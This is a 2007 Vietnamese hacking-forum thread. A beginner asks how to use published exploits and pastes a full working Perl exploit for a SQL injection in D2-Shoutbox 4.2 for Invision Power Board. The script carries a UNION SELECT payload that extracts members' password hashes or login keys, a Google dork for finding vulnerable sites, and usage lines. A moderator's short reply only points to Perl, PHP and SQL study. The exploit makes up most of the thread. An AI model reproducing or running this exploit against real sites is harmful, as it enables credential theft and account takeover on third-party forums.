banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận việc định hướng Vấn đề mà newbie nào có lẽ cũng muốn hỏi?  XML
  [Question]   Vấn đề mà newbie nào có lẽ cũng muốn hỏi? 13/04/2007 14:59:05 (+0700) | #1 | 53430
thaihabk05
Member

[Minus]    0    [Plus]
Joined: 04/09/2006 16:04:56
Messages: 8
Offline
[Profile] [PM]
Tiêu đề để vậy chắc mấy bạn tưởng mình sẽ viết một bài tut.
Nhưng mình cũng là newbie thôi, nên mình up bài này lên mong mấy anh chỉ giúp cho để newbie tụi mình học hỏi.
Câu hỏi của mình là về cách khai thác các bug như thế nào, vì em nhìn vào mấy bug như trên milw0rm chẳng hạn thì mình chắng biết sử dụng nó như thế nào cả.
Mấy bác thử phân tích một ví dụ sau cho em luôn nhe.Thanks trước.

#!/usr/bin/perl
#########################################################
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
#Created By SkOd #
#SED security Team #
#http://www.sed-team.be #
#skod.uk@gmail.com #
#ISRAEL #
#########################################################
#google:
#"Powered By D2-Shoutbox 4.2"
#########################################################
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid = $ARGV[3];
$pid = $ARGV[4];
$type = $ARGV[5];

sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2\n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
$path = $ARGV[1].$sql;
}


sub header()
{
print q{
#######################################################################
### D2-Shoutbox 4.2 SQL injection Exploit ###
### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
### Created By SkOd, Sed Security Team ###
#######################################################################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
#######################################################################
}
}

sub sedsock()
{
$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
print $sedsock "GET $path HTTP/1.1\n";
print $sedsock "Host: $host\n";
print $sedsock "Accept: */*\n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
print $sedsock "Connection: close\n\n";
while($res = <$sedsock>smilie{
$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
}
}

if(@ARGV < 6){
header();
}else{
type();
sedsock();
}
 
[Up] [Print Copy]
  [Question]   Vấn đề mà newbie nào có lẽ cũng muốn hỏi? 13/04/2007 18:47:34 (+0700) | #2 | 53439
Mr.Khoai
Moderator

Joined: 27/06/2006 01:55:07
Messages: 954
Offline
[Profile] [PM]
Gửi thaihabk05,

Các bài post như thế này bạn nên để vào tag quote hoặc code để không làm vỡ trang màn hình.

Muốn hiểu rõ đoạn exploit trên làm cụ thể những gì thì nên tìm hiểu thêm về perl. Muốn hiểu kết quả của đoạn code trên thì bạn nên tìm hiểu về PHP, SQL và web app attack.

khoai
[Up] [Print Copy]
  [Question]   Re: Vấn đề mà newbie nào có lẽ cũng muốn hỏi? 17/04/2007 11:12:57 (+0700) | #3 | 54201
mhuym
Member

[Minus]    0    [Plus]
Joined: 16/04/2007 23:28:11
Messages: 5
Offline
[Profile] [PM] [Email] [Yahoo!]
hic kô dễ ăn chút nào nhĩ!!!
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|